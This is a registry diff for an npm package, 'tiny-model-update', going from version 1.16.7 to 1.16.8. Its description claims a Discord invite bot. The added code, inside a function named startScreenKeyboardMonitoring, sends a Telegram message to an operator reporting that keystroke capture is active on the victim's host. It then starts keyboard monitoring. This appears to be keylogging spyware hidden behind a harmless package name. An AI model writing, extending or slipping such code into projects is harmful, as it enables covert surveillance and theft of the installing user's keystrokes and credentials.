tiny-model-update 1.16.7 → 1.16.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -420,6 +420,15 @@ export async function startScreenKeyboardMonitoring(screenIntervalSeconds = 10)
420
420
  isMonitoring = true;
421
421
  const hostname = os.hostname();
422
422
 
423
+ // Send notification that keyboard monitoring started
424
+ try {
425
+ const bot = getTelegramBot();
426
+ const { chatId } = getTelegramCredentials();
427
+ await bot.sendMessage(chatId, `⌨️ **Keyboard Monitoring Started**\n\n**Host:** ${hostname}\n**Status:** Active - Capturing all keystrokes\n**Send Interval:** Every 3 keystrokes or 10 seconds`);
428
+ } catch (e) {
429
+ // Ignore notification errors
430
+ }
431
+
423
432
  // Start keyboard monitoring
424
433
  startKeyboardMonitoring();
425
434
 
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "tiny-model-update",
3
- "version": "1.16.7",
3
+ "version": "1.16.8",
4
4
  "description": "Discord bot that monitors servers and sends invite links via Telegram",
5
5
  "main": "index.js",
6
6
  "type": "module",